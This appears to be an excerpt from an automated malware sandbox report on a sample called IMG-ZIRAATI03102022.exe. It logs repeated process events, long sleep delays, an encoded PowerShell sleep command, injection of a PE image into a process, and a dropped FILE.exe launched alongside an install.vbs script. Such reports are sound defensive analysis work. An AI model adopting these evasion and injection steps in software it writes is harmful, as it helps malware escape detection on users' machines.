              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe TID: 5808Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5188Thread sleep time: -14757395258967632s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exe TID: 2620Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4916Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exe TID: 3384Thread sleep count: 104 > 30
              Source: C:\Users\user\AppData\Roaming\FILE.exe TID: 3384Thread sleep time: -52000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\FILE.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\FILE.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9519Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9269Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: FILE.exe, 00000011.00000002.604000895.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: Base64 decoded Start-Sleep -Seconds 50
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: Base64 decoded Start-Sleep -Seconds 50Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: Base64 decoded Start-Sleep -Seconds 50Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeMemory written: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeProcess created: C:\Users\user\AppData\Roaming\FILE.exe C:\Users\user\AppData\Roaming\FILE.exeJump to behavior
              Source: logs.dat.23.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeQueries volume information: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeQueries volume information: C:\Users\user\AppData\Roaming\FILE.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\FILE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
